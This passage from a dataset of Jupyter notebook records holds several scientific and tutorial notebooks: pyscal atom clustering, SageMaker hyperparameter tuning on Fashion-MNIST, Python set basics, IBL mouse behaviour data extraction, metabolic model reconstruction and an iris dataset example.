[
"import pyscal.core as pc",
"_____no_output_____"
]
],
[
[
"Now we will set up a System with this input file, and calculate neighbors. Here we will use a cutoff method to find neighbors. More details about finding neighbors can be found [here](https://pyscal.readthedocs.io/en/latest/nearestneighbormethods.html#).",
"_____no_output_____"
]
],
[
[
"sys = pc.System()\nsys.read_inputfile('cluster.dump')\nsys.find_neighbors(method='cutoff', cutoff=3.63)",
"_____no_output_____"
]
],
[
[
"Once we compute the neighbors, the next step is to find solid atoms. This can be done using [System.find_solids](https://docs.pyscal.org/en/latest/pyscal.html#pyscal.core.System.find_solids) method. There are few parameters that can be set, which can be found in detail [here](https://docs.pyscal.org/en/latest/pyscal.html#pyscal.core.System.find_solids).",
"_____no_output_____"
]
],
[
[
"sys.find_solids(bonds=6, threshold=0.5, avgthreshold=0.6, cluster=False)",
"_____no_output_____"
]
],
[
[
"The above statement found all the solid atoms. Solid atoms can be identified by the value of the `solid` attribute. For that we first get the atom objects and select those with `solid` value as True.",
"_____no_output_____"
]
],
[
[
"atoms = sys.atoms\nsolids = [atom for atom in atoms if atom.solid]\nlen(solids)",
"_____no_output_____"
]
],
[
[
"There are 202 solid atoms in the system. In order to visualise in Ovito, we need to first write it out to a trajectory file. This can be done with the help of [to_file](https://docs.pyscal.org/en/latest/pyscal.html#pyscal.core.System.to_file) method of System. This method can help to save any attribute of the atom or ant Steinhardt parameter value. ",
"_____no_output_____"
]
],
[
[
"sys.to_file('sys.solid.dat', custom = ['solid'])",
"_____no_output_____"
]
],
[
[
"We can now visualise this file in Ovito. After opening the file in Ovito, the modifier [compute property](https://ovito.org/manual/particles.modifiers.compute_property.html) can be selected. The `Output property` should be `selection` and in the expression field, `solid==0` can be selected to select all the non solid atoms. Applying a modifier [delete selected particles](https://ovito.org/manual/particles.modifiers.delete_selected_particles.html) can be applied to delete all the non solid particles. The system after removing all the liquid atoms is shown below.",
"_____no_output_____"
],
[
"",
"_____no_output_____"
],
[
"### Clustering algorithm\n\nYou can see that there is a cluster of atom. The clustering functions that pyscal offers helps in this regard. If you used `find_clusters` with `cluster=True`, the clustering is carried out. Since we did used `cluster=False` above, we will rerun the function",
"_____no_output_____"
]
],
[
[
"sys.find_solids(bonds=6, threshold=0.5, avgthreshold=0.6, cluster=True)",
"_____no_output_____"
]
],
[
[
"You can see that the above function call returned the number of atoms belonging to the largest cluster as an output. In order to extract atoms that belong to the largest cluster, we can use the `largest_cluster` attribute of the atom.",
"_____no_output_____"
]
],
[
[
"atoms = sys.atoms\nlargest_cluster = [atom for atom in atoms if atom.largest_cluster]\nlen(largest_cluster)",
"_____no_output_____"
]
],
[
[
"The value matches that given by the function. Once again we will save this information to a file and visualise it in Ovito. ",
"_____no_output_____"
]
],
[
[
"sys.to_file('sys.cluster.dat', custom = ['solid', 'largest_cluster'])",
"_____no_output_____"
]
],
[
[
"The system visualised in Ovito following similar steps as above is shown below.",
"_____no_output_____"
],
[
"",
"_____no_output_____"
],
[
"It is clear from the image that the largest cluster of solid atoms was successfully identified. Clustering can be done over any property. The following example with the same system will illustrate this.",
"_____no_output_____"
],
[
"## Clustering based on a custom property",
"_____no_output_____"
],
[
"In pyscal, clustering can be done based on any property. The following example illustrates this. To find the clusters based on a custom property, the [System.clusters_atoms](https://docs.pyscal.org/en/latest/pyscal.html#pyscal.core.System.cluster_atoms) method has to be used. The simulation box shown above has the centre roughly at (25, 25, 25). For the custom clustering, we will cluster all atoms within a distance of 10 from the the rough centre of the box at (25, 25, 25). Let us define a function that checks the above condition.",
"_____no_output_____"
]
],
[
[
"def check_distance(atom):\n #get position of atom\n pos = atom.pos\n #calculate distance from (25, 25, 25)\n dist = ((pos[0]-25)**2 + (pos[1]-25)**2 + (pos[2]-25)**2)**0.5\n #check if dist < 10\n return (dist <= 10)",
"_____no_output_____"
]
],
[
[
"The above function would return True or False depending on a condition and takes the Atom as an argument. These are the two important conditions to be satisfied. Now we can pass this function to cluster. First, set up the system and find the neighbors. ",
"_____no_output_____"
]
],
[
[
"sys = pc.System()\nsys.read_inputfile('cluster.dump')\nsys.find_neighbors(method='cutoff', cutoff=3.63)",
"_____no_output_____"
]
],
[
[
"Now cluster",
"_____no_output_____"
]
],
[
[
"sys.cluster_atoms(check_distance)",
"_____no_output_____"
]
],
[
[
"There are 242 atoms in the cluster! Once again we can check this, save to a file and visualise in ovito.",
"_____no_output_____"
]
],
[
[
"atoms = sys.atoms\nlargest_cluster = [atom for atom in atoms if atom.largest_cluster]\nlen(largest_cluster)",
"_____no_output_____"
],
[
"sys.to_file('sys.dist.dat', custom = ['solid', 'largest_cluster'])",
"_____no_output_____"
]
],
[
[
"",
"_____no_output_____"
],
[
"This example illustrates that any property can be used to cluster the atoms!",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
]
] |
cb5398ad90814c7a725735e6d9685631d4f3690c | 7,059 | ipynb | Jupyter Notebook | sdkv2/ch10/model_tuning/Keras on Fashion-MNIST - Automatic Model Tuning + Callbacks.ipynb | dbe-gmbh/Learn-Amazon-SageMaker | 9a16e634c53717631027f540ca1abbd9cd8c653e | [
"MIT"
] | 1 | 2021-04-09T18:28:24.000Z | 2021-04-09T18:28:24.000Z | sdkv2/ch10/model_tuning/Keras on Fashion-MNIST - Automatic Model Tuning + Callbacks.ipynb | dbe-gmbh/Learn-Amazon-SageMaker | 9a16e634c53717631027f540ca1abbd9cd8c653e | [
"MIT"
] | null | null | null | sdkv2/ch10/model_tuning/Keras on Fashion-MNIST - Automatic Model Tuning + Callbacks.ipynb | dbe-gmbh/Learn-Amazon-SageMaker | 9a16e634c53717631027f540ca1abbd9cd8c653e | [
"MIT"
] | 1 | 2021-02-18T10:09:18.000Z | 2021-02-18T10:09:18.000Z | 25.952206 | 105 | 0.52217 | [
[
[
"## Download the Fashion-MNIST dataset",
"_____no_output_____"
]
],
[
[
"import os\nimport numpy as np\nfrom tensorflow.keras.datasets import fashion_mnist\n\n(x_train, y_train), (x_val, y_val) = fashion_mnist.load_data()\n\nos.makedirs(\"./data\", exist_ok = True)\nnp.savez('./data/training', image=x_train, label=y_train)\nnp.savez('./data/validation', image=x_val, label=y_val)",
"_____no_output_____"
],
[
"!pygmentize fmnist-3.py",
"_____no_output_____"
]
],
[
[
"## Upload Fashion-MNIST data to S3",
"_____no_output_____"
]
],
[
[
"import sagemaker\n\nprint(sagemaker.__version__)\n\nsess = sagemaker.Session()\nrole = sagemaker.get_execution_role()\nbucket = sess.default_bucket()\nprefix = 'keras2-fashion-mnist'\n\ntraining_input_path = sess.upload_data('data/training.npz', key_prefix=prefix+'/training')\nvalidation_input_path = sess.upload_data('data/validation.npz', key_prefix=prefix+'/validation')\noutput_path = 's3://{}/{}/output/'.format(bucket, prefix)\nchk_path = 's3://{}/{}/checkpoints/'.format(bucket, prefix)\n\nprint(training_input_path)\nprint(validation_input_path)\nprint(output_path)\nprint(chk_path)",
"_____no_output_____"
]
],
[
[
"## Train with Tensorflow",
"_____no_output_____"
]
],
[
[
"from sagemaker.tensorflow import TensorFlow\n\ntf_estimator = TensorFlow(entry_point='fmnist-3.py',\n role=role,\n instance_count=1, \n instance_type='ml.p3.2xlarge',\n framework_version='2.1.0', \n py_version='py3',\n hyperparameters={'epochs': 60},\n output_path=output_path,\n use_spot_instances=True,\n max_run=3600, \n max_wait=7200)",
"_____no_output_____"
],
[
"objective_metric_name = 'val_acc'\nobjective_type = 'Maximize'\nmetric_definitions = [\n {'Name': 'val_acc', 'Regex': 'Best val_accuracy: ([0-9\\\\.]+)'}\n]",
"_____no_output_____"
],
[
"from sagemaker.tuner import ContinuousParameter, IntegerParameter\n\nhyperparameter_ranges = {\n 'learning_rate': ContinuousParameter(0.001, 0.2, scaling_type='Logarithmic'), \n 'batch-size': IntegerParameter(32,512)\n}",
"_____no_output_____"
],
[
"from sagemaker.tuner import HyperparameterTuner\n\ntuner = HyperparameterTuner(tf_estimator,\n objective_metric_name,\n hyperparameter_ranges,\n metric_definitions=metric_definitions,\n objective_type=objective_type,\n max_jobs=60,\n max_parallel_jobs=2,\n early_stopping_type='Auto')",
"_____no_output_____"
],
[
"tuner.fit({'training': training_input_path, 'validation': validation_input_path})",
"_____no_output_____"
],
[
"from sagemaker.analytics import HyperparameterTuningJobAnalytics\n\nexp = HyperparameterTuningJobAnalytics(\n hyperparameter_tuning_job_name=tuner.latest_tuning_job.name)\n\njobs = exp.dataframe()\n\njobs.sort_values('FinalObjectiveValue', ascending=0)",
"_____no_output_____"
]
],
[
[
"## Deploy",
"_____no_output_____"
]
],
[
[
"import time\n\ntf_endpoint_name = 'keras-tf-fmnist-'+time.strftime(\"%Y-%m-%d-%H-%M-%S\", time.gmtime())\n\ntf_predictor = tuner.deploy(\n initial_instance_count=1, \n instance_type='ml.m5.large',\n endpoint_name=tf_endpoint_name)",
"_____no_output_____"
]
],
[
[
"## Predict ",
"_____no_output_____"
]
],
[
[
"%matplotlib inline\nimport random\nimport matplotlib.pyplot as plt\n\nnum_samples = 5\nindices = random.sample(range(x_val.shape[0] - 1), num_samples)\nimages = x_val[indices]/255\nlabels = y_val[indices]\n\nfor i in range(num_samples):\n plt.subplot(1,num_samples,i+1)\n plt.imshow(images[i].reshape(28, 28), cmap='gray')\n plt.title(labels[i])\n plt.axis('off')\n\npayload = images.reshape(num_samples, 28, 28, 1)",
"_____no_output_____"
],
[
"response = tf_predictor.predict(payload)\nprediction = np.array(response['predictions'])\npredicted_label = prediction.argmax(axis=1)\nprint('Predicted labels are: {}'.format(predicted_label))",
"_____no_output_____"
]
],
[
[
"## Clean up",
"_____no_output_____"
]
],
[
[
"tf_predictor.delete_endpoint()",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb53a42738ded5c8a6101c4f9c5d4025027cd9e2 | 2,708 | ipynb | Jupyter Notebook | Sets.ipynb | Sagnik001/Introduction-to-Python | c7fba3c9623c6c7ebe177ad53ef50225626f4d48 | [
"Apache-2.0"
] | 2 | 2020-02-10T10:05:05.000Z | 2020-02-10T10:05:23.000Z | Sets.ipynb | SUVOJIT-DESIGN/Introduction-to-Python | 7a92aceca37d1137404596a94ce5eaa1d9378b02 | [
"Apache-2.0"
] | null | null | null | Sets.ipynb | SUVOJIT-DESIGN/Introduction-to-Python | 7a92aceca37d1137404596a94ce5eaa1d9378b02 | [
"Apache-2.0"
] | 1 | 2020-10-07T11:52:45.000Z | 2020-10-07T11:52:45.000Z | 17.031447 | 68 | 0.417651 | [
[
[
"### Sets",
"_____no_output_____"
]
],
[
[
"{1,2,3}",
"_____no_output_____"
],
[
"{1,2,3,1,2,1,2,3,3,3,3,2,2,2,1,1,2}",
"_____no_output_____"
],
[
"thisset = {\"apple\", \"banana\", \"cherry\"}\n\nthisset.update([\"orange\", \"mango\", \"grapes\"])\n\nprint(thisset)",
"{'banana', 'orange', 'mango', 'cherry', 'grapes', 'apple'}\n"
],
[
"p=(1,2,3,1,2,1,2,3,3,3,3,2,2,2,1,1,1)\ns=set(p)\nprint(s)",
"{1, 2, 3}\n"
],
[
"thisset = {\"apple\", \"banana\", \"cherry\"}\n\nx = thisset.pop()\n\nprint(x)\n\nprint(thisset)",
"cherry\n{'banana', 'apple'}\n"
],
[
"set1 = {\"a\", \"b\" , \"c\"}\nset2 = {1, 2,1, 3}\nprint(set2)\nset3 = set1.union(set2)\nprint(set3)",
"{1, 2, 3}\n{1, 2, 3, 'c', 'a', 'b'}\n"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb53a60d8b0488e87880e947d9f08d15d82ddc70 | 17,667 | ipynb | Jupyter Notebook | bin/generate_recons.ipynb | gregmedlock/iterative_pfba | 7262bcea3f52e68556b7da5a21ac2d7f2adb0cf7 | [
"MIT"
] | 1 | 2020-08-05T13:05:09.000Z | 2020-08-05T13:05:09.000Z | bin/generate_recons.ipynb | medlocklab/iterative_pfba | 7262bcea3f52e68556b7da5a21ac2d7f2adb0cf7 | [
"MIT"
] | null | null | null | bin/generate_recons.ipynb | medlocklab/iterative_pfba | 7262bcea3f52e68556b7da5a21ac2d7f2adb0cf7 | [
"MIT"
] | null | null | null | 38.406522 | 138 | 0.447897 | [
[
[
"import mackinac\nimport cobra\nimport pandas as pd\nimport json\nimport os\nimport numpy as np",
"_____no_output_____"
],
[
"# load ID's for each organisms genome\nid_table = pd.read_table('../data/study_strain_subset_w_patric.tsv',sep='\\t',dtype=str)\nid_table = id_table.replace(np.nan, '', regex=True)\nspecies_to_id = dict(zip(id_table[\"designation in screen\"],id_table[\"PATRIC genome ID\"]))",
"_____no_output_____"
],
[
"id_table",
"_____no_output_____"
],
[
"mackinac.get_token('gregmedlock_seed')\n",
"patric password: ···············\n"
],
[
"# grab and save a universal model to be used later for gapfilling. This is a public template available in Mike Mundy's workspace.\n# The template says \"gramneg\", but there is no difference between the g+ and g- templates other than biomass composition,\n# which will not be used during gapfilling (the GENREs will already have their own biomass function).\ngramneg = mackinac.create_universal_model('/mmundy/public/modelsupport/templates/MicrobialNegativeResolved.modeltemplate')\ncobra.io.save_json_model(gramneg,'../data/universal_mundy.json')",
"_____no_output_____"
],
[
"# save id's and both names in dictionary\nname_to_recon_info = {}\nname_to_gapfill_solution = {}\nfor species in species_to_id.keys():\n # Check for an existing GENRE and make sure there is a PATRIC ID for the strain--\n # if there is no PATRIC ID, the dictionary will have an empty string for that strain.\n if species+'.json' not in os.listdir('../data/modelseed_models') and species_to_id[species]:\n species_id = species_to_id[species]\n\n # reconstruct model; function returns a dictionary with reconstruction info, NOT the model\n print(\"Reconstructing GENRE for \" + species)\n recon_info = mackinac.create_patric_model(species_id,species)\n name_to_recon_info[species] = recon_info\n # Get the reactions contained in the gapfill solution. This is on complete media\n name_to_gapfill_solution[species] = mackinac.get_patric_gapfill_solutions(species)[0]\n # convert to a cobra model\n model = mackinac.create_cobra_model_from_patric_model(species)\n # Save model in json format\n cobra.io.save_json_model(model, '../data/modelseed_models/'+species+'.json')\n \n # Save the model with gapfilled reactions removed\n gapfilled_reactions = name_to_gapfill_solution[species]['reactions'].keys()\n model.remove_reactions(gapfilled_reactions, remove_orphans=True)\n model.repair()\n cobra.io.save_json_model(model, '../data/modelseed_models/'+species+'_gapfill_removed.json')\n\n# save conversion dict for id:original_name:SEED_name mapping\nwith open('../data/patric_recon_info.json','w') as jsonfile:\n json.dump(name_to_recon_info,jsonfile)\n \n# save the gapfill solutions\nwith open('../data/patric_gapfill_solutions.json','w') as jsonfile:\n json.dump(name_to_gapfill_solution,jsonfile)\n ",
"Reconstructing GENRE for B. clarus\nReconstructing GENRE for B. vulgatus HM-720\nReconstructing GENRE for C. saccharolyticum\nReconstructing GENRE for L. lactis\nReconstructing GENRE for L. plantarum\nReconstructing GENRE for P. distasonis\nReconstructing GENRE for P. merdae\nReconstructing GENRE for R. gnavus\n"
],
[
"species_to_id",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb53a72d3653ebd23134b57f0a1db0c73c1d60c3 | 10,071 | ipynb | Jupyter Notebook | python/.ipynb_checkpoints/fetch_data_criteria-checkpoint.ipynb | int-brain-lab/ibl-changepoint | 84cc14dd212f1d21387d1259e9d7b41e96036e07 | [
"MIT"
] | 1 | 2020-07-23T13:39:38.000Z | 2020-07-23T13:39:38.000Z | python/.ipynb_checkpoints/fetch_data_criteria-checkpoint.ipynb | int-brain-lab/ibl-changepoint | 84cc14dd212f1d21387d1259e9d7b41e96036e07 | [
"MIT"
] | null | null | null | python/.ipynb_checkpoints/fetch_data_criteria-checkpoint.ipynb | int-brain-lab/ibl-changepoint | 84cc14dd212f1d21387d1259e9d7b41e96036e07 | [
"MIT"
] | null | null | null | 44.561947 | 711 | 0.586734 | [
[
[
"This script loads behavioral mice data (from `biasedChoiceWorld` protocol and, separately, the last three sessions of training) only from mice that pass a given (stricter) training criterion. For the `biasedChoiceWorld` protocol, only sessions achieving the `trained_1b` and `ready4ephysrig` training status are collected.\nThe data are slightly reformatted and saved as `.csv` files.",
"_____no_output_____"
]
],
[
[
"import datajoint as dj\ndj.config['database.host'] = 'datajoint.internationalbrainlab.org'\n\nfrom ibl_pipeline import subject, acquisition, action, behavior, reference, data\nfrom ibl_pipeline.analyses.behavior import PsychResults, SessionTrainingStatus\nfrom ibl_pipeline.utils import psychofit as psy\nfrom ibl_pipeline.analyses import behavior as behavior_analysis\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd",
"Connecting [email protected]:3306\n"
],
[
"import os\nmyPath = r\"C:\\Users\\Luigi\\Documents\\GitHub\\ibl-changepoint\\data\" # Write here your data path\nos.chdir(myPath)",
"_____no_output_____"
],
[
"# Get list of mice that satisfy given training criteria (stringent trained_1b)\n# Check query from behavioral paper: \n# https://github.com/int-brain-lab/paper-behavior/blob/master/paper_behavior_functions.py\n\nsubj_query = (subject.Subject * subject.SubjectLab * reference.Lab * subject.SubjectProject\n & 'subject_project = \"ibl_neuropixel_brainwide_01\"').aggr(\n (acquisition.Session * behavior_analysis.SessionTrainingStatus())\n# & 'training_status=\"trained_1a\" OR training_status=\"trained_1b\"',\n# & 'training_status=\"trained_1b\" OR training_status=\"ready4ephysrig\"',\n & 'training_status=\"trained_1b\"',\n 'subject_nickname', 'sex', 'subject_birth_date', 'institution',\n date_trained='min(date(session_start_time))')\n\nsubjects = (subj_query & 'date_trained < \"2019-09-30\"')\n\nmice_names = sorted(subjects.fetch('subject_nickname'))\n\nprint(mice_names)",
"['CSHL_002', 'CSHL_003', 'CSHL_005', 'CSHL_008', 'CSHL_010', 'CSHL_014', 'CSHL_015', 'CSH_ZAD_001', 'CSH_ZAD_003', 'CSH_ZAD_004', 'CSH_ZAD_006', 'CSH_ZAD_007', 'CSH_ZAD_010', 'DY_001', 'DY_006', 'DY_007', 'IBL-T1', 'IBL-T2', 'IBL-T4', 'IBL_001', 'IBL_002', 'KS002', 'KS003', 'KS004', 'KS005', 'KS014', 'KS015', 'KS016', 'KS017', 'KS019', 'NYU-01', 'NYU-02', 'NYU-06', 'SWC_009', 'SWC_013', 'SWC_014', 'ZM_1084', 'ZM_1085', 'ZM_1086', 'ZM_1087', 'ZM_1091', 'ZM_1092', 'ZM_1097', 'ZM_1098', 'ZM_1367', 'ZM_1371', 'ZM_1372', 'ZM_1743', 'ZM_1745', 'ZM_1746', 'ZM_1747', 'ibl_witten_03', 'ibl_witten_04', 'ibl_witten_05', 'ibl_witten_06', 'ibl_witten_12', 'ibl_witten_14', 'ibl_witten_15', 'ibl_witten_16']\n"
],
[
"sess_train = ((acquisition.Session * behavior_analysis.SessionTrainingStatus) & \n 'task_protocol LIKE \"%training%\"' & 'session_start_time < \"2019-09-30\"')\nsess_stable = ((acquisition.Session * behavior_analysis.SessionTrainingStatus) & \n 'task_protocol LIKE \"%biased%\"' & 'session_start_time < \"2019-09-30\"' & \n ('training_status=\"trained_1b\" OR training_status=\"ready4ephysrig\"'))\n \nstable_mice_names = list()\n\n# Perform at least this number of sessions\nMinSessionNumber = 4\n\ndef get_mouse_data(df):\n position_deg = 35. # Stimuli appear at +/- 35 degrees\n\n # Create new dataframe\n datamat = pd.DataFrame()\n datamat['trial_num'] = df['trial_id']\n datamat['session_num'] = np.cumsum(df['trial_id'] == 1)\n datamat['stim_probability_left'] = df['trial_stim_prob_left']\n signed_contrast = df['trial_stim_contrast_right'] - df['trial_stim_contrast_left']\n datamat['contrast'] = np.abs(signed_contrast)\n datamat['position'] = np.sign(signed_contrast)*position_deg\n datamat['response_choice'] = df['trial_response_choice']\n datamat.loc[df['trial_response_choice'] == 'CCW','response_choice'] = 1\n datamat.loc[df['trial_response_choice'] == 'CW','response_choice'] = -1\n datamat.loc[df['trial_response_choice'] == 'No Go','response_choice'] = 0\n datamat['trial_correct'] = np.double(df['trial_feedback_type']==1)\n datamat['reaction_time'] = df['trial_response_time'] - df['trial_stim_on_time'] # double-check\n\n # Since some trials have zero contrast, need to compute the alleged position separately\n datamat.loc[(datamat['trial_correct'] == 1) & (signed_contrast == 0),'position'] = \\\n datamat.loc[(datamat['trial_correct'] == 1) & (signed_contrast == 0),'response_choice']*position_deg\n datamat.loc[(datamat['trial_correct'] == 0) & (signed_contrast == 0),'position'] = \\\n datamat.loc[(datamat['trial_correct'] == 0) & (signed_contrast == 0),'response_choice']*(-position_deg)\n \n return datamat",
"_____no_output_____"
],
[
"# Loop over all mice\nfor mouse_nickname in mice_names:\n \n mouse_subject = {'subject_nickname': mouse_nickname}\n \n # Get mouse data for biased sessions\n behavior_stable = (behavior.TrialSet.Trial & (subject.Subject & mouse_subject)) \\\n * sess_stable.proj('session_uuid','task_protocol','session_start_time','training_status') * subject.Subject.proj('subject_nickname') \\\n * subject.SubjectLab.proj('lab_name')\n df = pd.DataFrame(behavior_stable.fetch(order_by='subject_nickname, session_start_time, trial_id', as_dict=True))\n\n if len(df) > 0: # The mouse has performed in at least one stable session with biased blocks \n datamat = get_mouse_data(df)\n\n # Take mice that have performed a minimum number of sessions\n if np.max(datamat['session_num']) >= MinSessionNumber:\n\n # Should add 'N' to mice names that start with numbers?\n\n # Save dataframe to CSV file\n filename = mouse_nickname + '.csv'\n datamat.to_csv(filename,index=False)\n stable_mice_names.append(mouse_nickname)\n \n # Get mouse last sessions of training data\n behavior_train = (behavior.TrialSet.Trial & (subject.Subject & mouse_subject)) \\\n * sess_train.proj('session_uuid','task_protocol','session_start_time') * subject.Subject.proj('subject_nickname') \\\n * subject.SubjectLab.proj('lab_name')\n df_train = pd.DataFrame(behavior_train.fetch(order_by='subject_nickname, session_start_time, trial_id', as_dict=True))\n\n datamat_train = get_mouse_data(df_train)\n Nlast = np.max(datamat_train['session_num']) - 3\n datamat_final = datamat_train[datamat_train['session_num'] > Nlast]\n\n # Save final training dataframe to CSV file\n filename = mouse_nickname + '_endtrain.csv'\n datamat_final.to_csv(filename,index=False)\n \n\nprint(stable_mice_names)",
"['CSHL_002', 'CSHL_003', 'CSHL_005', 'CSHL_008', 'CSHL_010', 'CSHL_014', 'CSHL_015', 'CSH_ZAD_001', 'CSH_ZAD_003', 'CSH_ZAD_004', 'CSH_ZAD_006', 'CSH_ZAD_007', 'CSH_ZAD_010', 'DY_001', 'DY_007', 'IBL-T1', 'IBL-T2', 'IBL-T4', 'IBL_001', 'IBL_002', 'KS002', 'KS003', 'KS004', 'KS005', 'KS014', 'KS015', 'KS016', 'KS017', 'NYU-01', 'NYU-02', 'NYU-06', 'SWC_013', 'ZM_1084', 'ZM_1085', 'ZM_1086', 'ZM_1087', 'ZM_1091', 'ZM_1092', 'ZM_1097', 'ZM_1098', 'ZM_1367', 'ZM_1371', 'ZM_1372', 'ZM_1743', 'ZM_1745', 'ZM_1746', 'ibl_witten_04', 'ibl_witten_05', 'ibl_witten_06', 'ibl_witten_12', 'ibl_witten_14', 'ibl_witten_15', 'ibl_witten_16']\n"
],
[
"len(stable_mice_names)",
"_____no_output_____"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb53a7d99a6719913de8b4809a8f5f260415c8dc | 977,968 | ipynb | Jupyter Notebook | notebooks/lab02_close_neighbors.ipynb | tiago-oom/Data-Mining-21-22 | eb250df37511ca1d2547be098ed477ba7f5996e9 | [
"MIT"
] | null | null | null | notebooks/lab02_close_neighbors.ipynb | tiago-oom/Data-Mining-21-22 | eb250df37511ca1d2547be098ed477ba7f5996e9 | [
"MIT"
] | null | null | null | notebooks/lab02_close_neighbors.ipynb | tiago-oom/Data-Mining-21-22 | eb250df37511ca1d2547be098ed477ba7f5996e9 | [
"MIT"
] | null | null | null | 42.032406 | 99,544 | 0.613784 | [
[
[
"# Distance Matrix",
"_____no_output_____"
]
],
[
[
"# imports\n# The sklearn library contains a lot of efficient tools for machine learning and statistical modeling including \n # classification, regression, clustering and dimensionality reduction\nfrom sklearn import datasets\n# used to perform a wide variety of mathematical operations on arrays. It adds powerful data structures to Python \n # that guarantee efficient calculations with arrays and matrices\nimport numpy as np",
"_____no_output_____"
],
[
"# abstract\ndataset = datasets.load_iris()",
"_____no_output_____"
],
[
"# dictionary\ndataset.keys()",
"_____no_output_____"
],
[
"dataset[\"feature_names\"]",
"_____no_output_____"
],
[
"data = dataset[\"data\"]\n# data is a numpy array data structure. Think of it as a matrix of data (or as an excel spreadsheet)",
"_____no_output_____"
],
[
"print(data.shape)\nprint(data)",
"(150, 4)\n[[5.1 3.5 1.4 0.2]\n [4.9 3. 1.4 0.2]\n [4.7 3.2 1.3 0.2]\n [4.6 3.1 1.5 0.2]\n [5. 3.6 1.4 0.2]\n [5.4 3.9 1.7 0.4]\n [4.6 3.4 1.4 0.3]\n [5. 3.4 1.5 0.2]\n [4.4 2.9 1.4 0.2]\n [4.9 3.1 1.5 0.1]\n [5.4 3.7 1.5 0.2]\n [4.8 3.4 1.6 0.2]\n [4.8 3. 1.4 0.1]\n [4.3 3. 1.1 0.1]\n [5.8 4. 1.2 0.2]\n [5.7 4.4 1.5 0.4]\n [5.4 3.9 1.3 0.4]\n [5.1 3.5 1.4 0.3]\n [5.7 3.8 1.7 0.3]\n [5.1 3.8 1.5 0.3]\n [5.4 3.4 1.7 0.2]\n [5.1 3.7 1.5 0.4]\n [4.6 3.6 1. 0.2]\n [5.1 3.3 1.7 0.5]\n [4.8 3.4 1.9 0.2]\n [5. 3. 1.6 0.2]\n [5. 3.4 1.6 0.4]\n [5.2 3.5 1.5 0.2]\n [5.2 3.4 1.4 0.2]\n [4.7 3.2 1.6 0.2]\n [4.8 3.1 1.6 0.2]\n [5.4 3.4 1.5 0.4]\n [5.2 4.1 1.5 0.1]\n [5.5 4.2 1.4 0.2]\n [4.9 3.1 1.5 0.2]\n [5. 3.2 1.2 0.2]\n [5.5 3.5 1.3 0.2]\n [4.9 3.6 1.4 0.1]\n [4.4 3. 1.3 0.2]\n [5.1 3.4 1.5 0.2]\n [5. 3.5 1.3 0.3]\n [4.5 2.3 1.3 0.3]\n [4.4 3.2 1.3 0.2]\n [5. 3.5 1.6 0.6]\n [5.1 3.8 1.9 0.4]\n [4.8 3. 1.4 0.3]\n [5.1 3.8 1.6 0.2]\n [4.6 3.2 1.4 0.2]\n [5.3 3.7 1.5 0.2]\n [5. 3.3 1.4 0.2]\n [7. 3.2 4.7 1.4]\n [6.4 3.2 4.5 1.5]\n [6.9 3.1 4.9 1.5]\n [5.5 2.3 4. 1.3]\n [6.5 2.8 4.6 1.5]\n [5.7 2.8 4.5 1.3]\n [6.3 3.3 4.7 1.6]\n [4.9 2.4 3.3 1. ]\n [6.6 2.9 4.6 1.3]\n [5.2 2.7 3.9 1.4]\n [5. 2. 3.5 1. ]\n [5.9 3. 4.2 1.5]\n [6. 2.2 4. 1. ]\n [6.1 2.9 4.7 1.4]\n [5.6 2.9 3.6 1.3]\n [6.7 3.1 4.4 1.4]\n [5.6 3. 4.5 1.5]\n [5.8 2.7 4.1 1. ]\n [6.2 2.2 4.5 1.5]\n [5.6 2.5 3.9 1.1]\n [5.9 3.2 4.8 1.8]\n [6.1 2.8 4. 1.3]\n [6.3 2.5 4.9 1.5]\n [6.1 2.8 4.7 1.2]\n [6.4 2.9 4.3 1.3]\n [6.6 3. 4.4 1.4]\n [6.8 2.8 4.8 1.4]\n [6.7 3. 5. 1.7]\n [6. 2.9 4.5 1.5]\n [5.7 2.6 3.5 1. ]\n [5.5 2.4 3.8 1.1]\n [5.5 2.4 3.7 1. ]\n [5.8 2.7 3.9 1.2]\n [6. 2.7 5.1 1.6]\n [5.4 3. 4.5 1.5]\n [6. 3.4 4.5 1.6]\n [6.7 3.1 4.7 1.5]\n [6.3 2.3 4.4 1.3]\n [5.6 3. 4.1 1.3]\n [5.5 2.5 4. 1.3]\n [5.5 2.6 4.4 1.2]\n [6.1 3. 4.6 1.4]\n [5.8 2.6 4. 1.2]\n [5. 2.3 3.3 1. ]\n [5.6 2.7 4.2 1.3]\n [5.7 3. 4.2 1.2]\n [5.7 2.9 4.2 1.3]\n [6.2 2.9 4.3 1.3]\n [5.1 2.5 3. 1.1]\n [5.7 2.8 4.1 1.3]\n [6.3 3.3 6. 2.5]\n [5.8 2.7 5.1 1.9]\n [7.1 3. 5.9 2.1]\n [6.3 2.9 5.6 1.8]\n [6.5 3. 5.8 2.2]\n [7.6 3. 6.6 2.1]\n [4.9 2.5 4.5 1.7]\n [7.3 2.9 6.3 1.8]\n [6.7 2.5 5.8 1.8]\n [7.2 3.6 6.1 2.5]\n [6.5 3.2 